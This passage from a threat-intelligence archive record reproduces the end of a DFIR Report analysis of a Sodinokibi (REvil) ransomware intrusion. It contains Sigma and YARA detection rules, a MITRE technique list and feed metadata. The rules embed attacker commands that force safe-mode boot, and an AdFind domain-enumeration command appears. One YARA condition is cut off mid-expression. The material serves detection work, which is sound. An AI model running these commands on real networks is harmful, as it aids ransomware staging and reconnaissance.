c394fcd2570/rules/windows/process_creation/win_office_shell.yml\r\nCustom rule thanks to @0xThiebaut\r\ntitle: Sodinokibi Ransomware Registry Key\r\nid: 9fecd354-77f0-498e-a611-c963970e7bca\r\ndescription: Detects the creation of Sodinokibi (aka REvil) registry keys\r\nstatus: experimental\r\nreferences:\r\n  - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\n  - https://twitter.com/malwrhunterteam/status/1372648463553462279\r\ntags:\r\n  - attack.persistence\r\n  - attack.t1547.001\r\ndate: 2021/03/29\r\nauthor: Maxime THIEBAUT (@0xThiebaut)\r\nlogsource:\r\n  category: registry_event\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    TargetObject|contains:\r\n      - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*AstraZeneca'\r\n      - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*franceisshit'\r\n  condition: selection\r\nlevel: high\r\nCustom rule thanks to @lindodapoet_\r\ntitle: Svchost data exfiltration\r\nid: dc4249c9-d96f-401b-a92b-caa6208c097d\r\nstatus: experimental\r\ndescription: Detects possible data exfiltration via svchost\r\nreferences:\r\n  - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nauthor: Nclose\r\ndate: 2021/03/29\r\ntags:\r\n  - attack.exfiltration\r\n  - attack.t1048\r\nlogsource:\r\n  product: windows\r\n  category: process_creation\r\ndetection:\r\n  selection:\r\n    CommandLine|contains: 'copy'\r\n    Image|endswith: '\\svchost.exe'\r\n  condition: selection\r\nfalsepositives:\r\n  - Unknown\r\nlevel: high\r\nCustom rules and rule ideas written by @BlackMatter23\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-03-29\r\nIdentifier: files\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule Sodinokibi_032021 {\r\nmeta:\r\ndescription = \"files - file DomainName.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-03-21\"\r\nhash1 = \"2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c\"\r\nstrings:\r\n$s1 = \"vmcompute.exe\" fullword wide\r\n$s2 = \"vmwp.exe\" fullword wide\r\n$s3 = \"bootcfg /raw /a /safeboot:network /id 1\" fullword ascii\r\n$s4 = \"bcdedit /set {current} safeboot network\" fullword ascii\r\n$s5 = \"7+a@P\u003e:N:0!F$%I-6MBEFb M\" fullword ascii\r\n$s6 = \"jg:\\\"\\\\0=Z\" fullword ascii\r\n$s7 = \"ERR0R D0UBLE RUN!\" fullword wide\r\n$s8 = \"VVVVVPQ\" fullword ascii\r\n$s9 = \"VVVVVWQ\" fullword ascii\r\n$s10 = \"Running\" fullword wide /* Goodware String - occurred 159 times */\r\n$s11 = 
\"expand 32-byte kexpand 16-byte k\" fullword ascii\r\n$s12 = \"9RFIT\\\"\u0026\" fullword ascii\r\n$s13 = \"jZXVf9F\" fullword ascii\r\n$s14 = \"tCWWWhS=@\" fullword ascii\r\n$s15 = \"vmms.exe\" fullword wide /* Goodware String - occured 1 times */\r\n$s16 = \"JJwK9Zl\" fullword ascii\r\n$s17 = \"KkT37uf4nNh2PqUDwZqxcHUMVV3yBwSHO#K\" fullword ascii\r\n$s18 = \"0*090}0\" fullword ascii /* Goodware String - occured 1 times */\r\n$s19 = \"5)5I5a5\" fullword ascii /* Goodware String - occured 1 times */\r\n$s20 = \"7-7H7c7\" fullword ascii /* Goodware String - occured 1 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 400KB and\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 25 of 27\n\n( pe.imphash() == \"031931d2f2d921a9d906454d42f21be0\" or 8 of them )\r\n}\r\nrule icedid_032021_1 {\r\nmeta:\r\ndescription = \"files - file skull-x64.dat\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-03-21\"\r\nhash1 = \"59a2a5fae1c51afbbf1bf8c6eb0a65cb2b8575794e3890f499f8935035e633fc\"\r\nstrings:\r\n$s1 = \"update\" fullword ascii /* Goodware String - occured 207 times */\r\n$s2 = \"PstmStr\" fullword ascii\r\n$s3 = \"mRsx0k/\" fullword wide\r\n$s4 = \"D$0lzK\" fullword ascii\r\n$s5 = \"A;Zts}H\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 100KB and\r\n( pe.imphash() == \"67a065c05a359d287f1fed9e91f823d5\" and ( pe.exports(\"PstmStr\") and pe.exports(\"update\") ) or\r\n}\r\nrule icedid_032021_2 {\r\nmeta:\r\ndescription = \"1 - file license.dat\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-03-21\"\r\nhash1 = \"45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865\"\r\nstrings:\r\n$s1 = \"+ M:{`n-\" fullword ascii\r\n$s2 = \"kwzzdd\" fullword ascii\r\n$s3 = \"w5O- \u003ez\" fullword ascii\r\n$s4 = \"RRlK8n@~\" fullword ascii\r\n$s5 = \"aQXDUkBC\" fullword ascii\r\n$s6 = \"}i.ZSj*\" fullword 
ascii\r\n$s7 = \"kLeSM?\" fullword ascii\r\n$s8 = \"qmnIqD\\\")P\" fullword ascii\r\n$s9 = \"aFAeU!,\" fullword ascii\r\n$s10 = \"Qjrf\\\"Q\" fullword ascii\r\n$s11 = \"PTpc,!P#\" fullword ascii\r\n$s12 = \"r@|JZOkfmT2\" fullword ascii\r\n$s13 = \"aPvBO,4\" fullword ascii\r\n$s14 = \"\u003efdFhl^S8Z\" fullword ascii\r\n$s15 = \"[syBE0\\\\\" fullword ascii\r\n$s16 = \"`YFOr.JH\" fullword ascii\r\n$s17 = \"C6ZVVF j7}\" fullword ascii\r\n$s18 = \"LPlagce\" fullword ascii\r\n$s19 = \"NLeF_-e`\" fullword ascii\r\n$s20 = \"HRRF|}O\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x43da and filesize \u003c 1000KB and\r\n8 of them\r\n}\r\nMITRE\r\nSpearphishing Attachment - T1566.001\r\nUser Execution - T1204\r\nWindows Management Instrumentation - T1047\r\nProcess Injection - T1055\r\nDomain Trust Discovery - T1482\r\nDomain Account - T1087.002\r\nSystem Information Discovery - T1082\r\nSystem Network Configuration Discovery - T1016\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 26 of 27\n\nSecurity Software Discovery - T1518.001\r\nSMB/Windows Admin Shares - T1021.002\r\nRemote Desktop Protocol - T1021.001\r\nCommonly Used Port - T1043\r\nApplication Layer Protocol - T1071\r\nExfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002\r\nData Encrypted for Impact - T1486\r\nMalicious File - T1204.002\r\nCommand and Scripting Interpreter - T1059\r\nPowerShell - T1059.001\r\nScheduled Task - T1053.005\r\nRemote System Discovery - T1018\r\nRundll32 - T1218.011\r\nInternal case # 1051\r\nSource: https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\r\nPage 27 of 27\n\n https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/   \ncmd.exe /C adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName \u003e some.csv\nLateral Movement    \nFor lateral movement, the threat actors used various techniques across the domain, 
one method being Cobalt Strike.\n  Page 11 of 27",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/"
	],
	"report_names": [
		"sodinokibi-aka-revil-ransomware"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434361,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a630fbe16b63a3f1fc42a0254abc5e2b81238415.pdf",
		"text": "https://archive.orkl.eu/a630fbe16b63a3f1fc42a0254abc5e2b81238415.txt",
		"img": "https://archive.orkl.eu/a630fbe16b63a3f1fc42a0254abc5e2b81238415.jpg"
	}
}